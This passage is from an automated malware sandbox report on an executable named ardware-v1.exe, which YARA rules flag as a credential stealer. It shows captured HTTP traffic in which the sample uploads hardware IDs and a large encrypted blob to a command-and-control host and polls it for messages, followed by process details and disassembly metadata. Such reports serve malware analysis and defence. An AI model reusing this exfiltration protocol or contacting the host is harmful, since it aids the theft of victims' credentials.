                                                                                                                                                                                                                                    Data Ascii: --DPBZA0XI7BIZVZ5YUContent-Disposition: form-data; name="hwid"B7CB4FFA20B498E6AC8923850305D13E--DPBZA0XI7BIZVZ5YUContent-Disposition: form-data; name="pid"1--DPBZA0XI7BIZVZ5YUContent-Disposition: form-data; name="lid"tfL8re----DPBZ
                                                                                                                                                                                                                                    2024-12-18 08:52:52 UTC1038INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Wed, 18 Dec 2024 08:52:52 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=agrcaf20hv03ngi5p487a1jfa7; expires=Sun, 13-Apr-2025 02:39:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OoM8sr8hAxiGJBtx%2FY3Cm6QUKAGwh%2Fl2vjkTz7NGbLvgnUpCcDdNL0TiCxHWfsEHmG9c%2BSlRpQNurf0EaIgI1VhYnhiXe3C9VupkJkAqGxr%2BIEtDTw3WNaJcGQc85LHC2ec%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8f3deb4e4fde4319-EWR
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1693&min_rtt=1690&rtt_var=639&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2147&delivery_rate=1703617&cwnd=233&unsent_bytes=0&cid=bf983fc2563a5984&ts=1475&x=0"
                                                                                                                                                                                                                                    2024-12-18 08:52:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                    2024-12-18 08:52:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    9192.168.2.549932172.67.157.2544431972C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-18 08:52:54 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=BMHH2DI7CB9
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Content-Length: 555019
                                                                                                                                                                                                                                    Host: lev-tolstoi.com
                                                                                                                                                                                                                                    2024-12-18 08:52:54 UTC15331OUTData Raw: 2d 2d 42 4d 48 48 32 44 49 37 43 42 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 43 42 34 46 46 41 32 30 42 34 39 38 45 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 42 4d 48 48 32 44 49 37 43 42 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 4d 48 48 32 44 49 37 43 42 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 66 4c 38 72 65 2d 2d 0d 0a 2d 2d 42 4d 48 48 32 44 49 37 43 42 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                                                    Data Ascii: --BMHH2DI7CB9Content-Disposition: form-data; name="hwid"B7CB4FFA20B498E6AC8923850305D13E--BMHH2DI7CB9Content-Disposition: form-data; name="pid"1--BMHH2DI7CB9Content-Disposition: form-data; name="lid"tfL8re----BMHH2DI7CB9Content-D
                                                                                                                                                                                                                                    2024-12-18 08:52:54 UTC15331OUTData Raw: 1b fb 66 40 52 9a c1 7d 29 d4 50 84 b7 84 16 3f f4 5a 68 fe 53 db 3f 86 b1 c6 c8 58 d5 e4 20 0c b2 7c 4e 66 12 d2 03 21 c9 ad 39 6d d7 f8 44 d1 fd 86 c6 0f 8d df 87 4c 46 91 95 ef 39 d8 42 79 06 08 75 85 af 46 2d 43 be c4 f8 84 a0 b9 d5 c2 55 f7 12 68 ca b9 e0 a9 e5 1f fa cc 1b 0d 4d 33 e8 1a 7c ae 27 74 57 fd 07 be 2f f6 98 52 31 2e 2d 3c a0 c4 de 43 50 20 58 0a bf 79 6d d2 3a 51 80 b2 34 a9 f6 3d 29 2c ea c2 56 74 f0 89 c8 fd 74 af 3f 64 ca da da 5c 50 a1 2b 38 32 b8 aa c8 e8 bb 63 8f 04 c7 91 e4 c3 38 ff 44 c8 dd 01 d4 92 9b 21 38 88 3b 26 31 4a f1 67 6f 28 01 da 11 14 ec e3 16 fe ce 6f bc f2 a9 26 38 21 b1 f5 d2 67 2c d9 a1 e5 93 0e 28 1e 5f a1 95 1d a7 f2 c6 9b 82 e6 8a ee ef 80 6e 5d 83 0d 11 c0 15 39 ea 9c ef 3d 77 03 3d d9 28 32 6e 31 f0 85 0f 76
                                                                                                                                                                                                                                    Data Ascii: f@R})P?ZhS?X |Nf!9mDLF9ByuF-CUhM3|'tW/R1.-<CP Xym:Q4=),Vtt?d\P+82c8D!8;&1Jgo(o&8!g,(_n]9=w=(2n1v
                                                                                                                                                                                                                                    2024-12-18 08:52:54 UTC15331OUTData Raw: ed 38 39 11 f5 56 b2 30 10 fd 69 98 12 17 1d 47 c1 ed 6e 43 dd b9 2d ea 13 ca 27 e6 91 22 e3 10 e1 66 73 02 2b 0c f1 fd 69 5c 70 45 b8 11 e5 9f 38 87 78 19 a0 a4 5c ca bf 50 db 11 8c d0 17 9c ad cd 60 48 6c ad ea 1b cf 28 fd 1e ad 32 1e ab ad 50 9e ea 4d 50 c1 67 c7 45 60 4a b7 dd da 88 f5 cc 4a 76 c6 60 d6 b7 82 54 53 85 b9 45 c1 23 2d 91 2c f7 85 df 38 e1 23 91 96 76 13 39 15 6d da 71 6b 9c 26 96 7b 41 d3 0c df 5c f3 b8 f1 d5 3b e1 a1 cd f5 23 eb be a6 b4 00 d1 36 b9 d4 88 3b bd ab 5a e4 af be c4 36 c3 8e 70 59 e6 b9 9a 3c 44 3b 6e 42 32 53 da 47 b0 fa 54 5b 16 ba 2b 24 7e c6 01 60 08 09 1f 85 e3 61 32 e6 e8 4b 1b dd 5c 1a 94 fc ee 8e a4 d4 f5 58 82 8a 47 b7 be 4c 20 47 6c cf 3c 73 c3 b8 36 2d 37 e3 8a b2 da a6 5d 5f 42 60 0a e7 23 3f b6 06 af 18 9b a9
                                                                                                                                                                                                                                    Data Ascii: 89V0iGnC-'"fs+i\pE8x\P`Hl(2PMPgE`JJv`TSE#-,8#v9mqk&{A\;#6;Z6pY<D;nB2SGT[+$~`a2K\XGL Gl<s6-7]_B`#?
                                                                                                                                                                                                                                    2024-12-18 08:52:54 UTC15331OUTData Raw: 72 f6 ff 3d 3b fc 14 e8 3a 83 b4 60 18 b9 69 40 ef 4e bf 0a ac dd f1 0d ed 7c 20 7e d6 bb 43 a7 2f d2 ad 58 ec e5 ab f4 80 16 0b 34 f9 1f d8 43 38 4e 02 de e3 12 56 aa 0a a4 ce 8b 32 3a ff 3c a1 33 b6 0f c3 8e 04 9b 62 9c df 69 9b 26 3c e0 e1 43 99 46 ea e4 fa e1 08 ea 7f 7f fc a6 14 ce ff 93 13 21 c6 77 33 c9 0c 76 08 04 82 64 c6 af 40 55 46 59 29 3d e9 06 a9 02 35 7d 91 fa 4d 80 91 2e 21 8e 86 93 1f c7 11 38 d1 25 62 2b bf ad c2 8f 7a f4 f1 7e c5 39 52 1b 77 35 e3 f7 34 2b af d4 69 65 29 26 8e 24 b9 a4 a3 c3 fb 4c 0f 56 a2 d9 d9 f8 b5 15 c7 35 61 81 dd 82 f9 05 64 3d ac 78 c7 cf 31 70 a4 99 a2 88 50 2d f6 4f 5a f5 b3 75 b9 c1 2c d5 3a 70 3f e5 70 9c a7 fe bc 55 6f a4 d6 54 1e 48 f6 ae f5 25 bc 8f 8a d4 dc 60 e1 e5 a8 eb c3 02 cc cf 2c c5 2c 22 f2 d0 98
                                                                                                                                                                                                                                    Data Ascii: r=;:`i@N| ~C/X4C8NV2:<3bi&<CF!w3vd@UFY)=5}M.!8%b+z~9Rw54+ie)&$LV5ad=x1pP-OZu,:p?pUoTH%`,,"
                                                                                                                                                                                                                                    2024-12-18 08:52:54 UTC15331OUTData Raw: 49 7c ec 86 78 d3 64 a6 d1 07 85 ba ea c5 91 ce 8a 40 c9 df 67 94 19 0a 22 af 00 1d cf f1 d3 ce 8c 0e eb d0 f0 80 90 97 1c 13 82 38 de 40 89 89 2d be 41 46 91 43 71 2c 61 bf 9d 71 04 f2 63 c7 e5 ed 8e 11 93 0a 0c 64 85 f6 ed 39 c7 72 3f 75 c2 4b 4c 47 6c fb e7 f2 49 4d cc 7d b9 d0 3b ff 4e 27 b9 cf cc 90 d2 d6 24 37 13 bd f1 fb c0 b9 0f 4e 4d c6 9d 07 c1 cb c3 49 9e 7c 9c a5 3e 58 5b fb 34 a2 15 71 4d 21 d8 30 ed 8b 72 7f 37 84 68 71 4e 1d 1f 54 0c bd fc ef 2d a8 c2 c2 e7 e2 42 d6 59 97 40 5c 29 c4 20 c0 5f 03 31 96 10 48 9d 63 14 da 64 5e 90 d0 35 fa 01 65 d6 7e 98 d9 1c 45 91 b7 3e b6 3f 9e 69 c9 45 98 fb 8b 76 25 8b f1 8c c7 f7 3d 46 7c 87 66 c8 69 8a 4d ee b2 cb 67 20 8a 2a 4f f8 dd 1f 13 3e 42 7e 43 ff dd 13 b4 fd 7f 3b 63 73 c2 ff fe 97 5a 03 d4 45
                                                                                                                                                                                                                                    Data Ascii: I|xd@g"8@-AFCq,aqcd9r?uKLGlIM};N'$7NMI|>X[4qM!0r7hqNT-BY@\) _1Hcd^5e~E>?iEv%=F|fiMg *O>B~C;csZE
                                                                                                                                                                                                                                    2024-12-18 08:52:54 UTC15331OUTData Raw: 0f ac 68 d5 03 af 19 fe be 42 c2 11 c0 02 6b f9 0f 81 f5 05 7e 4d 7e 70 04 51 48 01 3a 6d 0b fc 39 19 b5 24 6d 4e 0c 2b a3 82 2b 06 aa de 79 fb ac 0c 7d 56 db 9a 67 8f fd e7 ad c0 11 06 ce 61 67 b0 20 96 17 68 2e b4 30 f9 8b ff 1c c7 a1 78 5e 68 d9 7d 8e 19 b2 ff 2a a4 5b 23 9d 32 2d a8 12 15 d1 9b bd 19 21 af 8a 90 66 d6 37 9f 24 47 4c 99 0b be ab d0 34 19 d0 f1 28 89 3c 44 5e f3 ec d0 9b ff 50 70 c0 c4 ef 37 ce 48 0f 2b 01 54 b0 51 a6 00 be 62 ad 8e 86 62 31 60 eb a9 b4 8e 0a c8 25 f8 da 69 42 1f 69 70 eb 65 88 61 29 b7 13 27 c2 60 a6 78 d7 ed 99 17 e3 a9 9b d1 f0 49 90 4c 50 f7 e1 c9 8c 20 87 98 b9 2a 0e 33 e2 31 b1 1d c7 be e4 1d a9 be 71 11 7e 8b df b9 c9 6c 67 da 98 36 df 8c 5c c4 c1 66 b7 95 4e 33 d8 54 83 e2 94 f1 bb 7b bf 5c 9f db 8c 6d 4d 7a 20
                                                                                                                                                                                                                                    Data Ascii: hBk~M~pQH:m9$mN++y}Vgag h.0x^h}*[#2-!f7$GL4(<D^Pp7H+TQbb1`%iBipea)'`xILP *31q~lg6\fN3T{\mMz
                                                                                                                                                                                                                                    2024-12-18 08:52:54 UTC15331OUTData Raw: 2d 21 e3 0f 9f df e9 5a c0 56 95 40 75 e1 9e 04 6a fd 38 61 93 79 34 ea bd b8 d6 38 f8 96 7a 22 2d 44 22 53 79 02 61 c7 a4 d8 87 ff e1 cb 53 64 91 10 ec 93 e7 ca 7e f7 07 37 df cb af 99 b5 d3 e6 e9 73 d3 2a 4b 30 62 87 e1 5e 4f be 93 14 71 74 52 0b 45 bb b7 d5 26 36 1a f6 1b 7d 53 af 39 de 9b 9d dd 56 02 59 3b 88 f0 53 f8 37 24 f0 57 1d 62 ff 0c 12 a5 60 3c e2 6d 4b db 21 9c 9a c2 c9 4b 0d ef 8c 51 5d 65 45 f7 14 72 12 35 c7 39 ae 2f 93 f0 56 f7 48 b3 86 7e d8 eb e7 64 68 89 de 09 70 5b 29 4b 60 aa 73 aa c0 1f b5 b7 cc 75 d0 a6 c5 24 cf bc dd 00 21 09 de 06 27 2e 23 2f ee 7b 51 98 08 e3 49 56 2e e9 e8 60 f8 96 0a 33 c7 87 5c 79 34 56 d9 91 da 2d ea e6 fa c5 fb ef fa a5 84 03 a3 27 ca 2c 18 ca 0b ef cd 0b 29 20 88 f1 2b d0 10 30 bb 9f ce 75 70 7d 27 be bf
                                                                                                                                                                                                                                    Data Ascii: -!ZV@uj8ay48z"-D"SyaSd~7s*K0b^OqtRE&6}S9VY;S7$Wb`<mK!KQ]eEr59/VH~dhp[)K`su$!'.#/{QIV.`3\y4V-',) +0up}'
                                                                                                                                                                                                                                    2024-12-18 08:52:54 UTC15331OUTData Raw: 06 12 c8 84 86 32 2d 0a f6 d2 0d c2 40 8c b6 21 5e a8 61 c4 38 c4 b7 c3 fd e2 43 ec a5 3a 03 79 7c 31 ea 4a 3a e1 ee 61 b3 16 ef 4b 0f 08 99 4e 7e ec df 74 cb ec 1a e0 17 45 d5 fe f7 64 bc 38 38 24 f9 68 b7 df a0 70 31 70 77 7c ab 08 66 e5 10 13 a4 fc 00 8e 2f fa d4 17 75 da e9 e3 a4 af 34 67 4d 51 fa 52 63 74 13 12 35 90 56 0c 0a 87 f8 10 01 8a 50 6b 4f bf 45 b8 a1 f5 6a 8b a5 d4 39 5d 7c 7b 04 2d c0 bb 50 02 3c 85 89 ef 2e 08 93 72 1f 61 17 83 d6 fa 8f c4 18 fa 83 9d 29 91 be e7 4d 18 85 ef 52 97 ac 76 0e ca 17 1d 6e 40 90 9e a0 61 29 84 98 cc db 13 5a 3f a5 3c ce eb af 42 36 ac 8f 98 c0 0c a7 c9 98 d3 c1 cd 42 e9 d3 6d 19 b3 5c af a7 bc b2 de 3d 28 3f e3 2f 09 9f 7e 2b 41 27 d1 b1 94 65 64 dd a4 6b 1c 12 79 9d 33 50 76 e1 34 cd 2d 2d b8 2e b4 ef 24 11
                                                                                                                                                                                                                                    Data Ascii: 2-@!^a8C:y|1J:aKN~tEd88$hp1pw|f/u4gMQRct5VPkOEj9]|{-P<.ra)MRvn@a)Z?<B6Bm\=(?/~+A'edky3Pv4--.$
                                                                                                                                                                                                                                    2024-12-18 08:52:54 UTC15331OUTData Raw: 47 41 98 61 ad 9f fb 82 e8 87 fa ad 32 f4 c3 7b 38 93 22 8e a7 76 5a 7b 0b 5c e4 c8 66 e3 89 78 85 01 d6 58 50 81 97 59 4c 5c f4 ad 0a eb 2e d5 c1 56 f8 f7 8a f8 be d8 0d b1 9b dd 2c 55 de a0 4a b5 e8 ef 4d 66 dc e6 fc 87 d6 63 c3 0f dd a3 42 9c 08 f5 fb fb 47 94 56 99 ca e1 09 21 6a 21 43 65 51 08 fa ee f4 f8 30 50 16 c6 f7 02 5e 93 9e e3 a7 3d 58 5e ff 35 0c 9b ff f6 2e ef 02 b8 89 d4 9f c7 85 c0 b1 f7 f6 66 c4 e7 c5 48 f7 a6 0f 15 86 bf 6b e2 05 0a be 65 33 26 0e 17 8c 72 c3 27 0f e8 51 27 c7 3c 8e 3f a9 25 03 3d b1 69 80 70 bf 54 50 06 15 54 54 63 e9 51 c8 02 68 21 33 b9 0b a0 b4 fb f1 f5 ba b0 ff 43 77 a6 fa 8f d8 7c be ab d1 4e 3f 0a 0e e1 f4 07 f8 d9 12 e4 4c 00 2f 95 e1 3e 45 b0 8b 71 ea 6f a2 c9 0f 96 b6 b5 54 ef fd 42 e1 47 47 19 21 85 17 00 6e
                                                                                                                                                                                                                                    Data Ascii: GAa2{8"vZ{\fxXPYL\.V,UJMfcBGV!j!CeQ0P^=X^5.fHke3&r'Q'<?%=ipTPTTcQh!3Cw|N?L/>EqoTBGG!n
                                                                                                                                                                                                                                    2024-12-18 08:52:54 UTC15331OUTData Raw: 9a c4 bf 69 91 ac 37 0a 22 b4 4a c3 7b 1f ae b9 26 98 4a 81 5e 93 0a 94 46 88 83 6c 04 a1 f7 e6 1e 56 72 eb 8f 4f a9 16 c6 07 d6 a7 1e 25 e1 35 84 db df e1 81 71 d2 e6 f9 09 fe fb e4 8f 3c 1b 50 7d a0 45 e0 7d a1 4e a8 f7 bc e2 a5 af 71 91 74 5b e6 42 84 fb c0 84 a9 de e7 60 9a 26 ba c6 c8 b8 4b 17 84 ce ff 9c ce 30 1a 88 fa a4 cd 71 1d 6f 59 b7 69 d9 ec e0 1b 8d 69 15 44 f8 f4 90 7e e0 02 ef 5f 33 7e bd 85 68 6c 42 7f 2c 61 b3 a8 72 a2 de 7d 20 99 37 23 ce fa d5 93 5c f9 66 70 f3 79 e5 fa 80 4d 39 ed 26 eb d7 9c 42 01 6d 91 15 c4 3d 27 0a d1 16 87 08 01 a4 cc b0 0f 95 9b 05 63 ae 3e 8c 10 ee 50 b3 78 50 35 36 a2 7a 05 4f 1d d8 30 66 6f 24 08 73 df 6e 64 3b 6f a4 5c 28 5e bf 37 f7 d6 9a 45 9d 2b 32 e9 3f d1 e5 54 32 00 31 2c eb 48 d7 b7 21 e9 5e 1d fc c7
                                                                                                                                                                                                                                    Data Ascii: i7"J{&J^FlVrO%5q<P}E}Nqt[B`&K0qoYiiD~_3~hlB,ar} 7#\fpyM9&Bm='c>PxP56zO0fo$snd;o\(^7E+2?T21,H!^
                                                                                                                                                                                                                                    2024-12-18 08:52:57 UTC1046INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Wed, 18 Dec 2024 08:52:57 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=916ofml38auuk15a5vl4707218; expires=Sun, 13-Apr-2025 02:39:35 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VB%2F2GrEMbvifBY9maIsVUY%2F2lYMO3tfBbYB5oDVvgP24rqI0lWRmhzjPTUeJbM%2FNYuzppbReOPkRp%2BKvSmwHtDlimN%2Fc7BNPKCOlwaymlVTUb1zvKi4RzMSCLMoiqBDM5L8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8f3deb6199230f91-EWR
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1554&rtt_var=588&sent=331&recv=578&lost=0&retrans=0&sent_bytes=2834&recv_bytes=557514&delivery_rate=1853968&cwnd=218&unsent_bytes=0&cid=c5518ffde62254e1&ts=3386&x=0"


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    10192.168.2.549943172.67.157.2544431972C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-18 08:52:59 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Content-Length: 77
                                                                                                                                                                                                                                    Host: lev-tolstoi.com
                                                                                                                                                                                                                                    2024-12-18 08:52:59 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 66 4c 38 72 65 2d 2d 26 6a 3d 26 68 77 69 64 3d 42 37 43 42 34 46 46 41 32 30 42 34 39 38 45 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                    Data Ascii: act=get_message&ver=4.0&lid=tfL8re--&j=&hwid=B7CB4FFA20B498E6AC8923850305D13E
                                                                                                                                                                                                                                    2024-12-18 08:52:59 UTC1038INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Wed, 18 Dec 2024 08:52:59 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=u3gn23ditn93b4b4f34tger72l; expires=Sun, 13-Apr-2025 02:39:38 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKivnV9jVutieqH%2FUwS6UpAU8iBfxcPYJDN4sTpgmTp%2BzygynFGWcEsw33DAhb1IKknxhhYhQbnlodZezuTHkgGLUbJiM7C%2Bagp9M3b4rncinJEiuUC%2FLj%2FEiJxb7ua8rYE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8f3deb7f2d1341c1-EWR
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1672&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=976&delivery_rate=1672394&cwnd=205&unsent_bytes=0&cid=9679aaeb3680ef13&ts=756&x=0"
                                                                                                                                                                                                                                    2024-12-18 08:52:59 UTC54INData Raw: 33 30 0d 0a 6d 2b 77 6e 50 44 56 46 67 65 32 49 50 35 67 6e 34 74 71 42 48 61 50 71 51 48 33 31 46 4c 56 63 55 2b 65 30 4b 45 61 47 33 35 6e 41 73 51 3d 3d 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 30m+wnPDVFge2IP5gn4tqBHaPqQH31FLVcU+e0KEaG35nAsQ==
                                                                                                                                                                                                                                    2024-12-18 08:52:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                    Start time:03:51:02
                                                                                                                                                                                                                                    Start date:18/12/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\ardware-v1.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\ardware-v1.exe"
                                                                                                                                                                                                                                    Imagebase:0xf80000
                                                                                                                                                                                                                                    File size:3'487'960 bytes
                                                                                                                                                                                                                                    MD5 hash:C491DDBA2EE7516CFC5D5B57ECE509A2
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3121711204.0000000000B05000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3120968564.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3121039700.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3121763569.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                      Function 00B0082B Relevance: 4.3, Strings: 3, Instructions: 537COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000003.3121469673.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, Offset: 00AF6000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_3_af3000_ardware-v1.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: a$i$s
                                                                                                                                                                                                                                      • API String ID: 0-851615750
                                                                                                                                                                                                                                      • Opcode ID: 611e7e3c170a10096eedb48ba709d6a87ea71bf8ac79f2beb7136969936e6eab
                                                                                                                                                                                                                                      • Instruction ID: cfd347e55269de0062d19d3f9226324595f9bf20be80f9a9bf2f815f5caac7e3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 611e7e3c170a10096eedb48ba709d6a87ea71bf8ac79f2beb7136969936e6eab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A32739694E3C44FE31387709C69A963FB05F23248B4F42EBC0C4CB5E3E6589A59D762
                                                                                                                                                                                                                                      Function 00B0082B Relevance: 4.3, Strings: 3, Instructions: 537COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000003.3121469673.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, Offset: 00AF3000, based on PE: false
                                                                                                                                                                                                                                      • Associated: 00000000.00000003.3219399245.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_3_af3000_ardware-v1.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: a$i$s
                                                                                                                                                                                                                                      • API String ID: 0-851615750
                                                                                                                                                                                                                                      • Opcode ID: 5eb32c174ab992003179815265fad2ac39dfb08efa968fa89705632c0ad70299
                                                                                                                                                                                                                                      • Instruction ID: cfd347e55269de0062d19d3f9226324595f9bf20be80f9a9bf2f815f5caac7e3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5eb32c174ab992003179815265fad2ac39dfb08efa968fa89705632c0ad70299
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A32739694E3C44FE31387709C69A963FB05F23248B4F42EBC0C4CB5E3E6589A59D762
                                                                                                                                                                                                                                      Function 00B0082B Relevance: 4.3, Strings: 3, Instructions: 537COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
